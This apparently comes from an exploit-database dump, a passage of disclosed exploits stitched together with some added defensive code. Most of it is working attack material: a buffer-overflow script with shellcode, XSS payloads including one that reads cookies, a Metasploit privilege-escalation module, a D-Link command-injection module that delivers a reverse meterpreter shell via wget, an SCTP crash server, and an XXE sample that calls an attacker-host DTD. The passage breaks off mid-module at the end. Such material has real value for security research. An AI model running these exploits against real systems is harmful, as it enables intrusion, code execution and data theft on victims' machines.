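        if name == "wpt" and state["wpt"] is not None:
            w = state["wpt"]
            waypoints.append((w["lat"], w["lon"], w["name"]))
            state["wpt"] = None
        elif name == "name":
            state["in_name"] = False

    def chars(text):
        # Character data may arrive in several chunks; accumulate it.
        if state["in_name"]:
            state["wpt"]["name"] += text

    p.StartElementHandler = start
    p.EndElementHandler = end
    p.CharacterDataHandler = chars
    p.Parse(data, True)
    return waypoints


def is_safe_gpx(data):
    """True only if the document parses and used no DTD features."""
    try:
        scan_gpx(data)
        return True
    except (UnsafeGpx, xml.parsers.expat.ExpatError):
        return False


# Constructed benign GPX built from the advisory's waypoint.
BENIGN_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1" creator="constructed sample">
  <wpt lat="38.89767500" lon="-77.03654700">
    <name>1600PennsylvaniaAvenuenWashingt</name>
  </wpt>
</gpx>
"""

# Same document with the PoC's DOCTYPE prepended; the DTD URL is the advisory's
# placeholder and is never fetched because the parse stops at the DOCTYPE.
XXE_GPX = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE data [
<!ENTITY % sp SYSTEM "http://ATTACKERS-IP:9999/payload.dtd">
%sp;
]>
<gpx xmlns="http://www.topografix.com/GPX/1/1" version="1.1">
  <wpt lat="1" lon="2"><name>x</name></wpt>
</gpx>
"""
```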
-
Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Title: Wedding Slideshow Studio 1.36 - 'Key' Buffer Overflow
#Exploit Author : ZwX
#Exploit Date: 2020-02-09
#Vendor Homepage : http://www.wedding-slideshow-studio.com/
#Tested on OS: Windows 10 v1803
#Social: twitter.com/ZwX2a

## Steps to Reproduce: ##
#1. Run the python exploit script, it will create a new file with the name "poc.txt".
#2. Just copy the text inside "poc.txt".
#3. Start the program. In the new window click "Help" > "Register ...
#4. Now paste the content of "poc.txt" into the field: "Registration Key" > Click "Ok"
#5. The calculator runs successfully

#!/usr/bin/python
from struct import pack

buffer = "\x41" * 1608
nseh = "\xeb\x06\xff\xff"
seh = pack("<I",0x10023b8a) #0x10023b8a : pop edi # pop esi # ret 0x04 |{PAGE_EXECUTE_READ} [DVDPhotoData.dll]
#ASLR: False, Rebase: False, SafeSEH: False, OS: False, v8.0.6.0 (C:\Program Files\Wedding Slideshow Studio\DVDPhotoData.dll)

shellcode = ""
shellcode += "\xdb\xce\xbf\x90\x28\x2f\x09\xd9\x74\x24\xf4\x5d\x29"
shellcode += "\xc9\xb1\x31\x31\x7d\x18\x83\xc5\x04\x03\x7d\x84\xca"
shellcode += "\xda\xf5\x4c\x88\x25\x06\x8c\xed\xac\xe3\xbd\x2d\xca"
shellcode += "\x60\xed\x9d\x98\x25\x01\x55\xcc\xdd\x92\x1b\xd9\xd2"
shellcode += "\x13\x91\x3f\xdc\xa4\x8a\x7c\x7f\x26\xd1\x50\x5f\x17"
shellcode += "\x1a\xa5\x9e\x50\x47\x44\xf2\x09\x03\xfb\xe3\x3e\x59"
shellcode += "\xc0\x88\x0c\x4f\x40\x6c\xc4\x6e\x61\x23\x5f\x29\xa1"
shellcode += "\xc5\x8c\x41\xe8\xdd\xd1\x6c\xa2\x56\x21\x1a\x35\xbf"
shellcode += "\x78\xe3\x9a\xfe\xb5\x16\xe2\xc7\x71\xc9\x91\x31\x82"
shellcode += "\x74\xa2\x85\xf9\xa2\x27\x1e\x59\x20\x9f\xfa\x58\xe5"
shellcode += "\x46\x88\x56\x42\x0c\xd6\x7a\x55\xc1\x6c\x86\xde\xe4"
shellcode += "\xa2\x0f\xa4\xc2\x66\x54\x7e\x6a\x3e\x30\xd1\x93\x20"
shellcode += "\x9b\x8e\x31\x2a\x31\xda\x4b\x71\x5f\x1d\xd9\x0f\x2d"
shellcode += "\x1d\xe1\x0f\x01\x76\xd0\x84\xce\x01\xed\x4e\xab\xee"
shellcode += "\x0f\x5b\xc1\x86\x89\x0e\x68\xcb\x29\xe5\xae\xf2\xa9"
shellcode += "\x0c\x4e\x01\xb1\x64\x4b\x4d\x75\x94\x21\xde\x10\x9a"
shellcode += "\x96\xdf\x30\xf9\x79\x4c\xd8\xd0\x1c\xf4\x7b\x2d"

payload = buffer + nseh + seh + shellcode

try:
    f=open("poc.txt","w")
    print "[+] Creating %s bytes evil payload.." %len(payload)
    f.write(payload)
    f.close()
    print "[+] File created!"
except:
    print "File cannot be created"
-
Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
# Exploit Title: Forcepoint WebSecurity 8.5 - Reflective Cross-Site Scripting
# Exploit Author: Prasenjit Kanti Paul
# Vendor Homepage: https://www.forcepoint.com/
# Software Link: https://www.forcepoint.com/product/cloud-security/web-security
# Version: Forcepoint Web Security 8.5
# Tested on: Windows 7,10 and Linux Mint
# CVE : CVE-2019-6146
# ForcePoint KBA: https://support.forcepoint.com/KBArticle?id=000017702
# Video PoC: https://youtu.be/NfXGaNVK6eE

# Description: The user must visit a site that is restricted by Forcepoint
# policy, so that Forcepoint Web Security shows its generic block page.
# While rendering the "Domain Name" in that generic page, Forcepoint does
# not validate the Host header, which causes XSS.

Let's assume that, while accessing anysite.com, Forcepoint Web Security prevents us from going to that website with its custom exception/blocking page. Now follow the steps below:

*Steps*:
1. Intercept the traffic while accessing https://anysite.com
2. Modify the Host header from anysite.com to "> <script>alert("evilsite")</script>

*Timeline:*
- Oct. 21, 2019 - Issue Reported to PSIRT team of ForcePoint
- Oct. 23, 2019 - ForcePoint team confirms the issue
- Oct. 24, 2019 - CVE-2019-6146 has been assigned
- Jan. 23, 2020 - ForcePoint KBA has been published with proper fixes

*Regards,*
*Prasenjit Kanti Paul*
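An added defensive illustration, not Forcepoint's code: a block-page renderer that validates the Host header against hostname syntax before using it as the "Domain Name", and HTML-escapes every value it reflects, so the advisory's payload can neither pass validation nor, if some other path reflected it, break out of the markup. The page layout and the `reason` text are this example's assumptions; bracketed IPv6 hosts are not handled.

```python
import html
import re

# One DNS label: alphanumerics and hyphens, no leading/trailing hyphen, max 63 chars.
_LABEL = r"[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
# Hostname or IPv4 literal (digits-only labels match too), optional trailing dot.
_HOST_RE = re.compile(rf"^(?:{_LABEL})(?:\.{_LABEL})*\.?$")


def validate_host_header(value):
    """Return (host, port) if the Host header is syntactically hostname[:port], else None.

    Anything with quotes, angle brackets, spaces or slashes, such as the payload in
    the advisory, fails here and never reaches the page template."""
    if not value or len(value) > 255:
        return None
    host, port = value, None
    if ":" in value:
        host, port_str = value.rsplit(":", 1)
        if not port_str.isdigit() or not 1 <= int(port_str) <= 65535:
            return None
        port = int(port_str)
    if not _HOST_RE.match(host):
        return None
    return host.lower().rstrip("."), port


def render_block_page(host_header, reason):
    """Render the block page: validated host (or a fixed placeholder), everything escaped."""
    parsed = validate_host_header(host_header)
    shown = parsed[0] if parsed else "(invalid host header)"
    return (
        "<html><body><h1>Access blocked</h1>"
        f"<p>Domain Name: {html.escape(shown)}</p>"
        f"<p>Reason: {html.escape(reason)}</p>"
        "</body></html>"
    )
```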
-
WordPress Plugin LearnDash LMS 3.1.2 - Reflective Cross-Site Scripting
# Exploit Title: LearnDash WordPress LMS Plugin 3.1.2 - Reflective Cross-Site Scripting
# Date: 2020-01-14
# Vendor Homepage: https://www.learndash.com
# Vendor Changelog: https://learndash.releasenotes.io/release/uCskc-version-312
# Exploit Author: Jinson Varghese Behanan
# Author Advisory: https://www.getastra.com/blog/911/plugin-exploit/reflected-xss-vulnerability-found-in-learndash-lms-plugin/
# Author Homepage: https://www.jinsonvarghese.com
# Version: 3.0.0 - 3.1.1
# CVE : CVE-2020-7108

1. Description

LearnDash is one of the most popular and easiest-to-use WordPress LMS plugins on the market. It allows users to easily create courses and sell them online, and boasts a large customer base. The plugin allows users to search for courses they have subscribed to using the [ld_profile] search field, which was found to be vulnerable to reflected cross-site scripting. All WordPress websites using LearnDash version 3.0.0 through 3.1.1 are affected.

2. Proof of Concept

Once the user is logged in to the WordPress website where the vulnerable LearnDash plugin is installed, the XSS payload can be inserted into the Search Your Courses box. The payload gets executed because the user input is not properly validated. As a result, passing the XSS payload as a query string in the URL will also execute the payload.

[wordpress website][learndash my-account page]?ld-profile-search=%3Cscript%3Ealert(document.cookie)%3C/script%3E

An attacker can modify the above URL and use an advanced payload that could help him/her in performing malicious actions.

GET /wp-admin/admin-ajax.php?action=ld30_ajax_profile_search&shortcode_instance%5Buser_id%5D=1&shortcode_instance%5Bper_page%5D=20&shortcode_instance%5Border%5D=DESC&shortcode_instance%5Borderby%5D=ID&shortcode_instance%5Bcourse_points_user%5D=yes&shortcode_instance%5Bexpand_all%5D=false&shortcode_instance%5Bprofile_link%5D=true&shortcode_instance%5Bshow_header%5D=yes&shortcode_instance%5Bshow_quizzes%5D=true&shortcode_instance%5Bshow_search%5D=yes&shortcode_instance%5Bquiz_num%5D=20&shortcode_instance%5Bpaged%5D=1&shortcode_instance%5Bs%5D=&ld-profile-search=%3Cscript%3Ealert(123)%3C%2Fscript%3E HTTP/1.1
Host: learndashtesting.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: http://learndashtesting.com/my-account-2/
Cookie: wordpress_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7C7ec9ebfd67acdbc669395821f620198e67cb74780c9a8db63923b528aa661acd; PHPSESSID=e7c30849dbdab6f1cafcccef0ad7e7a0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_bcfe62773b0917e2688ccaecd96abe61=jinson%7C1581504173%7CeztvQWuKhSrnfkyEkwN0TvUU4CuVBpuyXeGErewuFOv%7Cfcf64acbc9b6ba7aaafb9c3b077581347d65ca8e010135cc232dcfc0335ec6d8; wordpress_cf_adm_use_adm=1; tk_ai=woo%3AEeO%2FMlU5TcDNKIjgYWPHxZVg; wp-settings-time-1=1581331685

3. Timeline

Vulnerability reported to the LearnDash team – January 14, 2020
LearnDash version 3.1.2 containing the fix released – January 14, 2020
-
Dota 2 7.23f - Denial of Service (PoC)
# Exploit Title: Dota 2 7.23f - Denial of Service (PoC)
# Google Dork: N/A
# Date: 2020-02-05
# Exploit Author: Bogdan Kurinnoy ([email protected]) (bi7s)
# Vendor Homepage: https://www.valvesoftware.com/en/
# Software Link: N/A
# Version: 7.23f
# Tested on: Windows 10 (x64)
# CVE : CVE-2020-7949

Valve Dota 2 (schemasystem.dll) before 7.23f allows remote attackers to achieve code execution or denial of service by creating a gaming server and inviting a victim to this server, because a crafted map is mishandled during a GetValue call.

The attacker needs to invite a victim to play on the attacker's game server using a specially crafted map, or to create a custom game; when the victim's game initializes, the specially crafted map is automatically downloaded and processed on the victim's side, which makes the vulnerability exploitable. An attacker can also create a custom map and upload it to Steam <https://steamcommunity.com/sharedfiles/filedetails/?id=328258382>.

Steps to reproduce:
1. Copy the attached file zuff.vpk (https://github.com/bi7s/CVE/blob/master/CVE-2020-7949/zuff.zip) to the map directory (C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\dota\maps)
2. Launch Dota2
3. Launch the "zuff" map from the Dota2 game console. Command for game console = map zuff
4. Dota2 crashes (Access Violation)

Debug information:

(2098.1634): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\Program Files (x86)\Steam\steamapps\common\dota 2 beta\game\bin\win64\schemasystem.dll -
(2098.1634): Access violation - code c0000005 (!!! second chance !!!)
rax=00000000ffffffff rbx=0000027ba23dd9b6 rcx=0000027ba23dd9b6
rdx=0000000042424242 rsi=0000027b5ffb9774 rdi=0000000000000000
rip=00007ffa73af90ce rsp=000000e82bcfe900 rbp=0000000000000000
 r8=00000000412ee51c  r9=000000e82bcfea88 r10=0000027b5ffb9774
r11=00000000412ee51c r12=0000027b5ffbe582 r13=000000e82bcfe9f0
r14=0000027b5ffb5328 r15=0000000000000010
iopl=0         nv up ei pl nz na pe nc
cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010200
schemasystem!BinaryProperties_GetValue+0x10ae:
00007ffa`73af90ce 40383b          cmp     byte ptr [rbx],dil ds:0000027b`a23dd9b6=??
-
Ricoh Driver - Privilege Escalation (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core/exploit/exe'

class MetasploitModule < Msf::Exploit::Local
  Rank = NormalRanking

  include Msf::Post::File
  include Msf::Exploit::EXE
  include Msf::Post::Windows::Priv
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'Ricoh Driver Privilege Escalation',
      'Description'     => %q(
        Various Ricoh printer drivers allow escalation of privileges on Windows systems.
        For vulnerable drivers, a low-privileged user can read/write files within the
        `RICOH_DRV` directory and its subdirectories. `PrintIsolationHost.exe`, a Windows
        process running as NT AUTHORITY\SYSTEM, loads driver-specific DLLs during the
        installation of a printer. A user can elevate to SYSTEM by writing a malicious DLL
        to the vulnerable driver directory and adding a new printer with a vulnerable driver.
        This module leverages the `prnmngr.vbs` script to add and delete printers.
        Multiple runs of this module may be required given successful exploitation is time-sensitive.
      ),
      'License'         => MSF_LICENSE,
      'Author'          =>
        [
          'Alexander Pudwill',  # discovery & PoC
          'Pentagrid AG',       # PoC
          'Shelby Pace'         # msf module
        ],
      'References'      =>
        [
          [ 'CVE', '2019-19363'],
          [ 'URL', 'https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/']
        ],
      'Arch'            => [ ARCH_X86, ARCH_X64 ],
      'Platform'        => 'win',
      'Payload'         => { },
      'SessionTypes'    => [ 'meterpreter' ],
      'Targets'         => [[ 'Windows', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]],
      'Notes'           =>
        {
          'SideEffects' => [ ARTIFACTS_ON_DISK ],
          'Reliability' => [ UNRELIABLE_SESSION ],
          'Stability'   => [ SERVICE_RESOURCE_LOSS ]
        },
      'DisclosureDate'  => "Jan 22 2020",
      'DefaultTarget'   => 0
    ))

    self.needs_cleanup = true

    register_advanced_options([
      OptBool.new('ForceExploit', [ false, 'Override check result', false ])
    ])
  end

  def check
    dir_name = "C:\\ProgramData\\RICOH_DRV"
    return CheckCode::Safe('No Ricoh driver directory found') unless directory?(dir_name)

    driver_names = dir(dir_name)
    return CheckCode::Detected("Detected Ricoh driver directory, but no installed drivers") unless driver_names.length

    vulnerable = false
    driver_names.each do |driver_name|
      full_path = "#{dir_name}\\#{driver_name}\\_common\\dlz"
      next unless directory?(full_path)

      @driver_path = full_path
      res = cmd_exec("icacls \"#{@driver_path}\"")
      next unless res.include?('Everyone:')
      next unless res.match(/\(F\)/)

      vulnerable = true
      break
    end

    return CheckCode::Detected('Ricoh driver directory does not have full permissions') unless vulnerable

    vprint_status("Vulnerable driver directory: #{@driver_path}")
    CheckCode::Appears('Ricoh driver directory has full permissions')
  end

  def add_printer(driver_name)
    fail_with(Failure::NotFound, 'Printer driver script not found') unless file?(@script_path)

    dll_data = generate_payload_dll
    dll_path = "#{@driver_path}\\headerfooter.dll"
    temp_path = expand_path('%TEMP%\\headerfooter.dll')
    vprint_status("Writing dll to #{temp_path}")

    bat_file_path = expand_path("%TEMP%\\#{Rex::Text.rand_text_alpha(5..9)}.bat")
    cp_cmd = "copy /y \"#{temp_path}\" \"#{dll_path}\""
    bat_file = <<~HEREDOC
      :repeat
      #{cp_cmd} && goto :repeat
    HEREDOC

    write_file(bat_file_path, bat_file)
    write_file(temp_path, dll_data)
    register_files_for_cleanup(bat_file_path, temp_path)

    script_cmd = "cscript \"#{@script_path}\" -a -p \"#{@printer_name}\" -m \"#{driver_name}\" -r \"lpt1:\""
    bat_cmd = "cmd.exe /c \"#{bat_file_path}\""

    print_status("Adding printer #{@printer_name}...")
    client.sys.process.execute(script_cmd, nil, { 'Hidden' => true })
    vprint_status("Executing script...")
    cmd_exec(bat_cmd)
  rescue Rex::Post::Meterpreter::RequestError => e
    e_log("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
  end

  def exploit
    fail_with(Failure::None, 'Already running as SYSTEM') if is_system?
    fail_with(Failure::None, 'Must have a Meterpreter session to run this module') unless session.type == 'meterpreter'

    if sysinfo['Architecture'] != payload.arch.first
      fail_with(Failure::BadConfig, 'The payload should use the same architecture as the target driver')
    end

    @driver_path = ''
    unless check == CheckCode::Appears || datastore['ForceExploit']
      fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override')
    end

    @printer_name = Rex::Text.rand_text_alpha(5..9)
    @script_path = "C:\\Windows\\System32\\Printing_Admin_Scripts\\en-US\\prnmngr.vbs"

    drvr_name = @driver_path.split('\\')
    drvr_name_idx = drvr_name.index('RICOH_DRV') + 1
    drvr_name = drvr_name[drvr_name_idx]

    add_printer(drvr_name)
  end

  def cleanup
    print_status("Deleting printer #{@printer_name}")
    Rex.sleep(3)
    delete_cmd = "cscript \"#{@script_path}\" -d -p \"#{@printer_name}\""
    client.sys.process.execute(delete_cmd, nil, { 'Hidden' => true })
  end
end
-
usersctp - Out-of-Bounds Reads in sctp_load_addresses_from_init
'''
usersctp is an SCTP library used by a variety of software including WebRTC.

There is a vulnerability in the sctp_load_addresses_from_init function of usersctp that can lead to a number of out-of-bounds reads.

The input to sctp_load_addresses_from_init is verified by calling sctp_arethere_unrecognized_parameters; however, there is a difference in how these functions handle parameter bounds. The function sctp_arethere_unrecognized_parameters does not process a parameter that is partially outside of the limit of the chunk, while sctp_load_addresses_from_init will continue processing until a parameter that is entirely outside of the chunk occurs. This means that the last parameter of a chunk is not always verified, which can lead to parameters with very short plen values being processed by sctp_load_addresses_from_init. This can lead to out-of-bounds reads whenever the plen is subtracted from the header len.

To reproduce this issue:

1) run the attached 'server', initack.py

python init_ack.py

2) run the sample usersctp client

./programs/.libs/client 127.0.0.1 7 0 8888 7777

The client will crash.
'''
import sys
from socket import *
import zlib

ECHO_PORT = 7777
BUFSIZE = 1024

def getshort(arr):
    return ord(arr[1]) + (ord(arr[0]) << 8);

def getlen(arr):
    return ord(arr[0]) + (ord(arr[1]) << 8);

def main():
    server()

def print_pack(pack):
    o = ""
    for item in pack:
        o = o + hex(ord(item)) + " "
    print "PACKET SENT", o

def server():
    times = 0
    if len(sys.argv) > 2:
        port = eval(sys.argv[2])
    else:
        port = ECHO_PORT
    s = socket(AF_INET, SOCK_DGRAM)
    s.bind(('', port))
    print 'udp echo server ready'
    while 1:
        data, addr = s.recvfrom(BUFSIZE)
        pack = ""
        for item in data:
            pack = pack + hex(ord(item)) + " "
        print 'server received %r from %r' % (pack, addr)
        vtag = data[16:20]
        type = ord(data[12])
        length = getshort(data[14:])
        port = "\x00\x07" + data[0:2]
        print "type", type, "len", length, "plen", len(data)
        ia = "\x86\x02\x01\x00\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\x18\x33\x03\xc3\x07\x00\x01\x8e\x05\x00\x07\x00\x14\x0b\x36\x14\x01\x30\x2a\xe6\x97\x19\x00\x2c\x7c\x9f\xf9\x33\x05\x80\x03\x00\x01"
        print "vtag", hex(ord(vtag[0])), hex(ord(vtag[1])), hex(ord(vtag[2])), hex(ord(vtag[3]))
        o = port + "\0\0\0\0" + "\0\0\0\0" + vtag + ia[1:]
        crc = zlib.crc32(o) & 0xffffffff
        crcb= chr(crc&0xf) + chr((crc>> 8)&0xf) + chr((crc>> 16)&0xf) + chr((crc>> 24)&0xf)
        o = port + vtag + crcb + ia[1:]
        print_pack(o)
        s.sendto(o, addr)

main()
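The report above turns on two routines that apply different bounds rules to the last parameter of a chunk. As an added example (not code from usersctp or from the report), the C walk below applies one set of rules to every parameter, so a validation pass and a consuming pass cannot disagree: a parameter header that is only partly inside the chunk is rejected rather than skipped, and a plen shorter than the 4-byte parameter header is rejected before anything is subtracted from it. Offsets follow RFC 4960; the sample chunks are constructed for the demonstration.

```c
/* Added example, not usrsctp code: one parameter walk for an SCTP INIT/INIT-ACK
 * chunk whose bounds rules cover every parameter, including the last one.
 * Layout per RFC 4960: 4-byte chunk header, chunk-specific fixed part, then TLV
 * parameters (2-byte type, 2-byte length including the header), each padded to
 * 4 bytes except possibly the last. The sample chunks below are constructed. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define SCTP_CHUNK_HDR_LEN  4
#define SCTP_PARAM_HDR_LEN  4
#define SCTP_INIT_FIXED_LEN 16

enum param_walk_result {
    PARAMS_OK = 0,        /* every parameter fits and has a sane plen */
    PARAMS_SHORT_HEADER,  /* a parameter header runs past the chunk end */
    PARAMS_BAD_PLEN,      /* plen < 4: subtracting it from a header length underflows */
    PARAMS_TRUNCATED      /* plen claims more bytes than remain in the chunk */
};

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Walk the parameters of one chunk. chunk points at the chunk header and chunk_len
 * is its length field (already checked against the packet by the caller). The same
 * three rules apply to every parameter, so a consumer that runs after a successful
 * walk never sees a parameter that is partly outside the chunk or shorter than 4.
 * *count receives the number of parameters accepted before the walk stopped. */
enum param_walk_result sctp_walk_params(const uint8_t *chunk, size_t chunk_len,
                                        size_t fixed_len, size_t *count)
{
    size_t off = SCTP_CHUNK_HDR_LEN + fixed_len;
    size_t n = 0;
    if (count) *count = 0;
    if (chunk_len < off)
        return PARAMS_TRUNCATED;
    while (off < chunk_len) {
        /* Rule 1: the 4-byte header must lie entirely inside the chunk; a header
         * that is only partly inside is an error, not something to skip. */
        if (chunk_len - off < SCTP_PARAM_HDR_LEN)
            return PARAMS_SHORT_HEADER;
        uint16_t plen = be16(chunk + off + 2);
        /* Rule 2: plen counts the header, so anything below 4 is invalid. This is
         * the "very short plen" the report describes. */
        if (plen < SCTP_PARAM_HDR_LEN)
            return PARAMS_BAD_PLEN;
        /* Rule 3: the whole value must fit in the bytes that remain. */
        if (plen > chunk_len - off)
            return PARAMS_TRUNCATED;
        if (count) *count = ++n;
        /* Advance by the padded length; the final parameter may be unpadded. */
        size_t padded = (plen + 3u) & ~(size_t)3u;
        off = (padded > chunk_len - off) ? chunk_len : off + padded;
    }
    return PARAMS_OK;
}

/* Wrap constructed parameter bytes in an INIT chunk (type 1) and walk it. */
static enum param_walk_result walk_sample(const uint8_t *params, size_t params_len,
                                          size_t *count)
{
    uint8_t buf[64] = {0};
    size_t len = SCTP_CHUNK_HDR_LEN + SCTP_INIT_FIXED_LEN + params_len;
    buf[0] = 1;                    /* chunk type INIT */
    buf[2] = (uint8_t)(len >> 8);  /* chunk length, big-endian */
    buf[3] = (uint8_t)len;
    memcpy(buf + SCTP_CHUNK_HDR_LEN + SCTP_INIT_FIXED_LEN, params, params_len);
    return sctp_walk_params(buf, len, SCTP_INIT_FIXED_LEN, count);
}

/* Constructed parameter lists, each starting with a valid IPv4 Address parameter
 * (type 5, plen 8) and ending with the case of interest. */
enum sample_case { SAMPLE_WELL_FORMED, SAMPLE_TINY_PLEN, SAMPLE_TRUNCATED, SAMPLE_PARTIAL_HDR };
static const uint8_t S_OK[]    = { 0,5,0,8,127,0,0,1, 0,12,0,6,0,5 };  /* last: Supported Addr Types, plen 6, unpadded */
static const uint8_t S_TINY[]  = { 0,5,0,8,127,0,0,1, 0,11,0,1 };      /* last: plen 1 */
static const uint8_t S_TRUNC[] = { 0,5,0,8,127,0,0,1, 0,5,0,8,10,0 };  /* last: plen 8, only 6 bytes left */
static const uint8_t S_PART[]  = { 0,5,0,8,127,0,0,1, 0,5 };           /* last: 2 header bytes left */

enum param_walk_result walk_sample_case(enum sample_case c, size_t *count)
{
    switch (c) {
    case SAMPLE_WELL_FORMED: return walk_sample(S_OK, sizeof S_OK, count);
    case SAMPLE_TINY_PLEN:   return walk_sample(S_TINY, sizeof S_TINY, count);
    case SAMPLE_TRUNCATED:   return walk_sample(S_TRUNC, sizeof S_TRUNC, count);
    default:                 return walk_sample(S_PART, sizeof S_PART, count);
    }
}

int main(void)
{
    static const char *names[] = { "well-formed", "tiny plen", "truncated value", "partial header" };
    for (int c = SAMPLE_WELL_FORMED; c <= SAMPLE_PARTIAL_HDR; c++) {
        size_t n = 0;
        int r = walk_sample_case((enum sample_case)c, &n);
        printf("%-16s -> result %d, %zu parameter(s) accepted\n", names[c], r, n);
    }
    return 0;
}
```

The three rejection cases are exactly the shapes that slip past a check which stops at the first parameter that is "partially outside" but lets the consumer read it anyway.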
-
iOS/macOS - Out-of-Bounds Timestamp Write in IOAccelCommandQueue2::processSegmentKernelCommand()
While investigating possible shared memory issues in AGXCommandQueue::processSegmentKernelCommand(), I noticed that the size checks used to parse the IOAccelKernelCommand in IOAccelCommandQueue2::processSegmentKernelCommand() are incorrect.

The IOAccelKernelCommand contains an 8-byte header consisting of a command type and size, followed by structured data specific to the type of command. When verifying that the size of the IOAccelKernelCommand has enough data for the specific command type, it appears that the check excludes the size of the 8-byte header, meaning that processSegmentKernelCommand() will parse up to 8 bytes of out-of-bounds data.

Normally I wouldn't consider this very security-relevant. However, command type 2 corresponds to kIOAccelKernelCommandCollectTimeStamp, which actually *writes* into the OOB memory rather than just parsing data from it. (The IOAccelKernelCommand is being parsed from shared memory, so the write is visible to userspace.) This makes it possible to overwrite the first 1-8 bytes of the subsequent page of memory with timestamp data.

The attached POC should trigger the issue on iOS 13. Tested on iPod9,1 17B111. I haven't tested on macOS, but it looks like the issue is present there as well.

I'll also tack on to this issue that on the whole AGXCommandQueue seems to do a poor job of treating shared memory as volatile, and I suspect that there are further issues here that are worth looking into. For example, when IOAccelKernelCommand's type is 0x10000, AGXCommandQueue::processSegmentKernelCommand() does not use the fourth parameter (which points to the end of the IOAccelKernelCommand as parsed by IOAccelCommandQueue2::processSegmentKernelCommands()) except when passing it to IOAccelCommandQueue2::processSegmentKernelCommand(), instead double-fetching the command size from shared memory to verify that all the command data is in-bounds. Thus, I believe it's possible to make AGXCommandQueue::processSegmentKernelCommand() parse out-of-bounds data, although I have not found a way to turn this into an interesting exploitation primitive.

I don't think the shared memory issues are isolated to this function either. For example, there used to be much more readily exploitable double-fetches in AGXAllocationList2::initWithSharedResourceList(), although these were fixed sometime between 16A5288q and 16G77.

Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/48035.zip
-
D-Link Devices - Unauthenticated Remote Command Execution in ssdpcgi (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::CmdStager

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi',
      'Description'    => %q{
        D-Link Devices Unauthenticated Remote Command Execution in ssdpcgi.
      },
      'Author'         =>
        [
          's1kr10s',
          'secenv'
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2019-20215'],
          ['URL', 'https://medium.com/@s1kr10s/2e799acb8a73']
        ],
      'DisclosureDate' => 'Dec 24 2019',
      'Privileged'     => true,
      'Platform'       => 'linux',
      'Arch'           => ARCH_MIPSBE,
      'DefaultOptions' =>
        {
          'PAYLOAD'           => 'linux/mipsbe/meterpreter_reverse_tcp',
          'CMDSTAGER::FLAVOR' => 'wget',
          'RPORT'             => '1900'
        },
      'Targets'        =>
        [
          [ 'Auto', { } ],
        ],
      'CmdStagerFlavor' => %w{ echo wget },
      'DefaultTarget'  => 0
    ))

    register_options(
      [
        Msf::OptEnum.new('VECTOR', [true, 'Header through which to exploit the vulnerability', 'URN', ['URN', 'UUID']])
      ])
  end

  def exploit
    execute_cmdstager(linemax: 1500)
  end

  def execute_command(cmd, opts)
    type = datastore['VECTOR']
    if type == "URN"
      print_status("Target Payload URN")
      val = "urn:device:1;`#{cmd}`"
    else
      print_status("Target Payload UUID")
      val = "uuid:`#{cmd}`"
    end

    connect_udp
    header = "M-SEARCH * HTTP/1.1\r\n"
    header << "Host:239.255.255.250: " + datastore['RPORT'].to_s + "\r\n"
    header << "ST:#{val}\r\n"
    header << "Man:\"ssdp:discover\"\r\n"
    header << "MX:2\r\n\r\n"
    udp_sock.put(header)
    disconnect_udp
  end
end
-
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit)
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote

  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Expect

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'OpenSMTPD MAIL FROM Remote Code Execution',
      'Description'    => %q{
        This module exploits a command injection in the MAIL FROM field during
        SMTP interaction with OpenSMTPD to execute code as the root user.
      },
      'Author'         => [
        'Qualys', # Discovery and PoC
        'wvu',    # Module
        'RageLtMan <rageltman[at]sempervictus>' # Module
      ],
      'References'     => [
        ['CVE', '2020-7247'],
        ['URL', 'https://www.openwall.com/lists/oss-security/2020/01/28/3']
      ],
      'DisclosureDate' => '2020-01-28',
      'License'        => MSF_LICENSE,
      'Platform'       => 'unix',
      'Arch'           => ARCH_CMD,
      'Privileged'     => true,
      'Targets'        => [
        ['OpenSMTPD >= commit a8e222352f',
         'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
        ]
      ],
      'DefaultTarget'  => 0,
